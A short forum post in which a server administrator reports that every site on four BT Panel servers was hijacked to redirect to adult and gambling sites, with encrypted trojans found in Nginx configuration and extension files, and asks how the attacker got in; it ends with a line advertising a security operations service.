BT Panel: trojans planted in both the Nginx configuration file and the extension file
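Today I found that every site on four servers had been hijacked, redirecting to adult sites and gambling sites. Looking at the site source code, I found this suspicious JS: data:image/png;base64, Then I found an encrypted trojan in both the nginx configuration file and the extension file. The nginx versions on the servers are 1.2.4.0 and 1.21.4. Do any experts here know how this hacker got in?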
If you need security operations services, you can contact our company's security operations account manager.